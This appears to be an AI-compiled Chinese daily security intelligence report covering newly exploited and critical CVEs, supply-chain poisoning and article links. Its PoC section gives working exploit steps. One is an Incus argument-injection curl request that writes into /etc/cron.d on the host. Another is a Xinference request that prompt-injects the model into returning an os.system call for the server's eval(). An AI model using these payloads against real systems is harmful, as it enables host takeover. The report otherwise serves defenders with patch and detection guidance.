每日安全情报报告 · 2026-08-23
由 AI 整理发布
数据覆盖窗口:2026-08-21 ~ 2026-08-23(近 24--48 小时新增 / 在野动态)
重点标注 🔴 在野利用(KEV)、🟠 高危未野、🟡 已修复/澄清
一、本期风险概览
过去 48 小时,CISA 又将 Zimbra(CVE-2026-73570) 与 TrueConf Server 双漏洞(CVE-2026-72529 / CVE-2026-72530) 列入 KEV,均确认在野利用,且涉及邮件基础设施与视频会议基础设施,供应链与身份平面风险同步走高。AI 基础设施持续成为高危爆发点:Incus(CVSS 9.9) 与 Xinference(CVSS 10.0) 相继公开 PoC / 技术复现;Azure SQL Database(CVSS 10.0) 曝 SSRF 提权。供应链侧,Rust 三 crate 与 14 个 npm 包被投毒,AI 驱动后门(RedC2 4.0 / RedShell)进入依赖图即触发。
| 风险级别 | 数量 | 代表项 |
|---|---|---|
| 🔴 在野利用(KEV) | 4 簇 | Zimbra、TrueConf×2、macOS 屏幕共享、Windows IKE |
| 🟠 高危(PoC/技术复现) | 5 | Incus、Xinference、Azure SQL、Citrix NetScaler×2、miniOrange SAML×2 |
| 🟡 已修复/澄清 | 2 | Entra ID(更正未利用)、Rust/npm 供应链 |
二、最新高危漏洞(近 24--48 小时)
🔴 CVE-2026-73570 --- Zimbra Collaboration Suite 未认证 OS 命令注入(在野 / KEV)
- 漏洞类型:OS 命令注入(CWE-78)
- 受影响组件 :Zimbra Collaboration Suite(ZCS)< 10.1.20,且安装
zimbra-snmp并启用 SNMP 通知(snmp_notify参数 +swatchdog服务,后者默认开启) - CVSS:8.9(High)
- 在野利用 :✅ CISA 于 2026-08-21 列入 KEV,波兰 CERT(CERT Polska)确认活跃利用;联邦修复截止 2026-08-24(3 天窗口)
- 利用路径 :攻击者发送特制 SMTP 请求,经由 SNMP 通知处理流程将恶意字符串注入
swatchdog,以zimbra用户权限执行任意系统命令(无需认证、SMTP 可达即可) - 影响面 :Shadowserver 统计全球 12,100+ 台 Zimbra 服务器暴露互联网;邮件服务器失陷等于交出邮箱凭证与内网入口
- 参考链接 :CISA KEV 目录 · CERT Polska 利用预警 · Zimbra 修复版本 10.1.20 · 中文编译(代码卫士)
🔴 CVE-2026-72529 / CVE-2026-72530 --- TrueConf Server 双漏洞(在野 / KEV,Head Mare)
- 漏洞类型:CVE-2026-72529 缺失认证(调用未文档化函数执行脚本)/ CVE-2026-72530 代码注入(沙箱逃逸至宿主机)
- 受影响组件:TrueConf Server < 5.3.9 / 5.4.9 / 5.5.5(含 2022 年以来全部版本),经 TCP/4307 可达
- CVSS :CVE-2026-72529 9.8 (厂商)/ 9.3(NVD);CVE-2026-72530 9.0(厂商)/ 9.5(NVD)
- 在野利用 :✅ CISA 于 2026-08-20 列入 KEV,亲乌黑客行动组织 Head Mare 至少自 2026-07 起利用,替换客户端安装器投递 PhantomCore 后门;联邦截止 CVE-2026-72529 为 2026-08-23(今日) 、CVE-2026-72530 为 2026-09-03
- 攻击链:TCP/4307 直达 → 未认证调用未文档化函数执行脚本(72529)→ 逃逸隔离环境执行宿主机命令(72530)→ 部署 WebShell、篡改数据库、替换合法客户端安装器
- 参考链接 :CISA KEV 目录 · TrueConf 官方安全公告 · BleepingComputer 报道 · Security Affairs 攻击链分析
🔴 CVE-2026-65400 --- Apple macOS 屏幕共享预认证 RCE(在野 / KEV)
- 漏洞类型:不当认证(CWE-287),网络攻击者可在无有效凭证下认证到屏幕共享
- 受影响组件:macOS Sequoia 15.7.9 / Sonoma 14.8.9 / Tahoe 26.6.1 之前
- CVSS:9.8(Critical)
- 在野利用 :✅ CISA 于 2026-08-18 列入 KEV(评分由 7.1 上调至 9.8),联邦截止 2026-09-01;Microsoft 遥测与 NCSC-NL 确认 root 级入侵 + 部署 XMRig 门罗币挖矿(SSH 持久化)
- 现状 :约 4 万台开启屏幕共享(端口 5900)的主机暴露互联网,近半在美国;已有公开 PoC,Calif 研究人员用 AI Agent 4 小时内武器化 CVE-2026-65400 及伴随漏洞 CVE-2026-43760
- 参考链接 :CISA KEV 目录 · NCSC-NL 咨询 · 威胁简报(检测 IoC)
🔴 CVE-2026-33824 --- Windows IKE 扩展双重释放(在野 / KEV,刚过截止)
- 漏洞类型:双重释放(CWE-415),预认证 RCE(UDP 500/4500)
- 受影响组件:Windows Internet Key Exchange (IKE) Extension
- CVSS:9.8(Critical);EPSS 55.85%
- 在野利用 :✅ CISA 于 2026-08-18 列入 KEV,联邦截止 2026-08-21(已逾期);中文背景 APT 结合 DeepSeek 自主攻击被指参与利用
- 参考链接 :CISA KEV 目录 · CISA 8/18 四连发公告 · NVD 详情
🟠 CVE-2026-48755 --- Incus 备份压缩参数注入致主机文件写入 / RCE(PoC 公开)
- 漏洞类型:参数注入(CWE-88)/ 输入验证不当(CWE-20)
- 受影响组件:Incus(容器与 VM 管理器)< 7.2.0(GHSA 标注 7.1.0 修复,建议升 7.2.0)
- CVSS:9.9(Critical)
- PoC:✅ 公开(GitHub Security Advisory 含完整 Python PoC);多租户环境下容器逃逸即主机沦陷
- 根因 :
compression_algorithm仅校验首 token,尾部参数直接拼接进zstd -c ...命令,可用--pass-through -o重定向写任意主机路径 - 参考链接 :GitHub Advisory GHSA-v6mj-8pf4-hhw4 · SecureLayer7 技术复现 · vuln.today 概览
🟠 CVE-2026-61539 --- Xinference Llama3 工具调用 eval() RCE(CVSS 10.0)
- 漏洞类型:动态求值代码注入(CWE-95,eval injection)
- 受影响组件:Xinference(xorbitsai/inference)≤ 2.5.0(含至 < 2.7.0 的脆弱解析路径)
- CVSS:10.0(Critical)
- 利用条件 :默认配置无认证,向
/v1/chat/completions发送含tools字段的请求,诱导模型返回__import__('os').system('...')形式的工具调用参数,服务端eval()直接执行 - 发现:腾讯玄武实验室 XlabAI 团队 / Atuin 自动化漏洞发现引擎
- 参考链接 :GitHub Advisory GHSA-x2rj-828p-hx9m · IONIX 技术分析 · NVD 详情 · 修复版本 v2.7.0
🟠 CVE-2026-69502 --- Azure SQL Database SSRF 提权(CVSS 10.0)
- 漏洞类型:服务端请求伪造(SSRF)致权限提升(CWE-918)
- 受影响组件:Microsoft Azure SQL Database
- CVSS:10.0(Critical)
- 风险:未认证攻击者经网络提升权限,潜在访问 Azure 内部基础设施或跨租户数据;云托管,微软控制修复时间线,暂无公开 PoC / 确认在野
- 参考链接 :Enigma 每日威胁情报(2026-08-22)
🟠 CVE-2026-19489 / CVE-2026-19490 --- Citrix NetScaler ADC / Gateway 双漏洞(Critical)
- 漏洞类型:CVE-2026-19489 内存溢出致 DoS(CWE-119);CVE-2026-19490 替代路径认证绕过(CWE-288)
- 受影响组件:NetScaler ADC / Gateway 14.1 < 14.1-73.32、13.1 < 13.1-63.21(含 FIPS / NDcPP 变体)
- CVSS :CVE-2026-19489 8.8(v4.0) ;CVE-2026-19490 9.3(v4.0)
- 前置条件:19489 需启用 SIP ALG 的 LSN 组;19490 需配置为 Gateway(SSL VPN / ICA Proxy / CVPN / RDP Proxy)或 AAA vserver(新版需叠加 SAML action)
- 参考链接 :Citrix 官方安全公告 CTX696939 · CERT-EU 咨询 · HKCERT 中文报道
🟠 CVE-2026-61979 / CVE-2026-15981 --- miniOrange SAML 2.0 (WordPress) 认证绕过
- 漏洞类型:CVE-2026-61979 签名算法混淆(可伪造断言);CVE-2026-15981 误读 OpenSSL 错误码为有效
- 受影响组件:miniOrange SAML 2.0 Single Sign On 插件(7 个独立版本线,仅免费版公开进漏洞库,6 个付费版长期未登记)
- 风险:攻击者可伪造断言登录任意用户(含管理员);DigitalOcean 发现其以单一上架条目发布多版本线,导致付费版修复滞后
- 参考链接 :Patchstack 披露 · CyberSecBrief 每日简报
🟡 CVE-2026-69836 --- Microsoft Entra ID 反序列化 RCE(已云端修复 / 更正未利用)
- 漏洞类型:反序列化不可信数据(CWE-502),未认证网络 RCE
- CVSS:10.0(Critical)
- 最新状态 :2026-08-20 披露、一度标注"在野",2026-08-21 微软更正为未利用,已云端全量修复,无需客户打补丁;未入 KEV
- 参考链接 :CyberRecaps 报道 · Help Net Security
三、漏洞 PoC 与复现(使用步骤)
⚠️ 以下命令仅供授权环境下的漏洞验证与防御性测试。请在可销毁的隔离环境运行,勿对未授权系统使用。
1. 🟠 Incus CVE-2026-48755(参数注入 → 主机文件写入 → 计划任务 RCE)
PoC 来源 :GitHub Advisory GHSA-v6mj-8pf4-hhw4(含完整 Python 利用脚本)
复现思路(单请求 curl 版,等价于官方 PoC):
bash
# 0. 依赖:任意可访问 Incus API 的客户端(需备份权限的已认证 cert/key)
# 1. 准备恶意计划任务内容并推入实例
incus file push /tmp/cron_payload.sh c01/incus-zstd-cron
# 2. 触发备份,注入压缩算法参数(zstd --pass-through 重定向写主机路径)
curl -sk --cert ~/.config/incus/client.crt --key ~/.config/incus/client.key \
-X POST https://remote-incus:8443/1.0/instances/c01/backups \
-H 'Content-Type: application/json' \
-d '{
"compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- /var/lib/incus/storage-pools/default/containers/c01/rootfs/incus-zstd-cron",
"instance_only": true
}'
# 3. 检查主机 /etc/cron.d/incus-zstd-rce 是否被写入 ⇒ 主机文件写入原语成立
修复 :升级 Incus ≥ 7.2.0(仅允许单独二进制名,拒绝多余参数);无临时绕过,须吊销不可信客户端的 API 访问。
参考 :SecureLayer7 复现 · vuln.today
2. 🟠 Xinference CVE-2026-61539(eval() 注入 RCE)
PoC 来源 :GitHub Advisory GHSA-x2rj-828p-hx9m
复现(Python requests,仅验证执行 touch /tmp/hacked):
bash
# 依赖
pip install requests xinference # 本地起一个 ≤2.5.0 的测试实例
# 构造"工具调用"负载,使模型输出被 eval() 执行
python3 - <<'PY'
import requests
url = "http://target:9997/v1/chat/completions"
payload = {
"model": "your-llama3-model",
"messages": [{"role": "user", "content": "call the tool"}],
"tools": [{
"type": "function",
"function": {
"name": "demo",
"parameters": {"type": "object", "properties": {}}
}
}],
# 通过 prompt injection 让模型返回如下 tool-call 参数:
# __import__('os').system('touch /tmp/hacked')
}
r = requests.post(url, json=payload)
print(r.text)
PY
# 验证:目标主机出现 /tmp/hacked 即证明 eval 注入可达
修复 :升级 Xinference ≥ 2.7.0;临时缓解------禁止将 /v1/chat/completions 暴露公网、关闭 Llama3 工具调用、以最小权限 + 容器隔离运行。
参考 :IONIX 技术分析 · 修复版本 v2.7.0
3. 🔴 Zimbra CVE-2026-73570(无公开武器化 PoC,提供检测 / 狩猎 IoC)
防御侧排查(CERT Polska 指引):
bash
# 1. 检查 zimbra 服务异常启停(恶意负载触发 "stopped→running" 或 "running→stopped")
grep -E "szkodliwy|malicious" /var/log/zimbra.log
# 2. 排查 zimbra 用户近 30 天在以下目录新建的文件
find /opt/zimbra/jetty/webapps/ /opt/zimbra/jetty_base/webapps/ /tmp/ \
-user zimbra -type f -mtime -30 -ls
修复 :升级至 ZCS 10.1.20+;紧急时可关闭 SNMP 通知功能并严控 SMTP 入站;发现可疑即保全日志、隔离主机、轮换凭证。
参考 :CERT Polska 预警 · Gridinsoft 响应清单
4. 🔴 macOS 屏幕共享 CVE-2026-65400(公开 PoC,提供检测要点)
公开 PoC :已存在(Calif 研究者 AI 武器化,4 小时);公开检测狩猎清单见 AJ King 威胁简报。
bash
# 网络层:阻断来自不可信 IP 的 5900 入站
# 终端检测(EDR / 统一日志):
log show --predicate 'subsystem == "com.apple.screensharing"' --last 7d | grep -i "root"
# 排查隐藏 XMRig:
ls -la ~/Library/Application\ Support/.config/sysmond 2>/dev/null
# 排查异常 SSH 公钥 / pfctl 规则变更 / ad-hoc 签名二进制
修复:升级至 macOS Sequoia 15.7.9 / Sonoma 14.8.9 / Tahoe 26.6.1+;关闭不必要的屏幕共享公网暴露。
5. 🔴 TrueConf CVE-2026-72529 / CVE-2026-72530(无公开 PoC,提供检测 + 加固)
bash
# 资产排查:扫描内网 4307/TCP 监听(含"被遗忘"的部署)
nmap -p 4307 --open 10.0.0.0/8
# 版本确认(需 ≥ 5.3.9 / 5.4.9 / 5.5.5)
# 检测入侵:locale.php 篡改、WebShell、异常服务、GitHub C2 流量、TrueConf 协议异常
修复 :升级至厂商指定修复版;网络层立即限制 4307/TCP 仅管理 VLAN / 零信任网关可达;假设已失陷,执行完整事件响应与凭证轮换。
参考 :Shield53 KEV 预警 · The IT Guys 攻击链
四、供应链与威胁情报
- 🟠 Rust 供应链投毒(CVSS 9.8) :攻击者在 crates.io 劫持维护者账号,向
arrayref 0.3.10、internment 0.8.7、append-only-vec 0.1.9注入proc-macro1构建期投递器(Dropper),构建期即执行、极难检测,归因朝鲜(Sapphire Sleet)。审计Cargo.lock、使用cargo-audit/cargo-vet、从干净环境重建并轮换构建期可接触凭证。来源:NCSC-FI 预警 · CyberSecBrief 综述 - 🟠 14 个 npm 包投递 RedC2 4.0 Linux 后门(RedShell) :包名伪装为日历 / 连胜统计工具(如
streak-metrics-math、map-streak-kit等),import 即触发 ,绕过--ignore-scripts,由 Red Agent(自然语言转后渗透命令的 AI 助手)驱动。来源:CyberRecaps 报道 · Trend AI Security - 🟡 仍在窗口期的 8/18 四连 KEV (联邦 8/21 截止已逾期,但资产仍高危):Windows IKE
CVE-2026-33824、VMware vCenter 路径遍历CVE-2026-59310(47 国 361 IP,Babuk 衍生勒索)、SharePoint 弱认证CVE-2026-55040(Rapid7 PoC 后已遭在野)、macOS 屏幕共享CVE-2026-65400。来源:CISA 8/18 公告
五、网络安全最新文章(附链接)
- Zimbra 严重 RCE 漏洞正遭在野利用 --- FreeBuf 早报(含 AI Agent 攻破 Snowflake、Cloudflare Workers Spectre、Operation CameraSwarm 等 8-22 速报)
- Critical Zimbra RCE flaw now actively exploited in attacks --- zeroday.news(CERT Polska 预警全文)
- CISA Adds Zimbra CVE-2026-73570 to KEV Catalog(三日修复窗口) --- Metrotechs
- TrueConf Server Exploitation: PhantomCore Delivered via CVE-2026-72529 / 72530 --- Security Affairs
- CISA orders feds to patch actively exploited TrueConf Server flaws --- BleepingComputer
- CVE-2026-48755: Incus Argument Injection → RCE(含复现) --- SecureLayer7 Lab
- CVE-2026-61539 -- Unauthenticated RCE in Xinference(eval 注入) --- IONIX Threat Center
- Critical Citrix NetScaler Flaw Lets Remote Attackers Bypass Authentication --- HKCERT
- macOS Screen Sharing Pre-Auth RCE Exploited for Cryptojacking(CVE-2026-65400) --- AJ King 威胁简报
- 14 trojanized npm packages drop RedC2 Linux backdoor --- CyberRecaps
- Critical Entra ID RCE CVE-2026-69836 exploited in wild(后更正未利用) --- CyberRecaps
- Daily Threat Intelligence Digest -- August 22, 2026(含 Incus / Xinference / Azure SQL / Zimbra KEV / Rust 供应链) --- Enigma Global
部分内容由 AI 辅助生成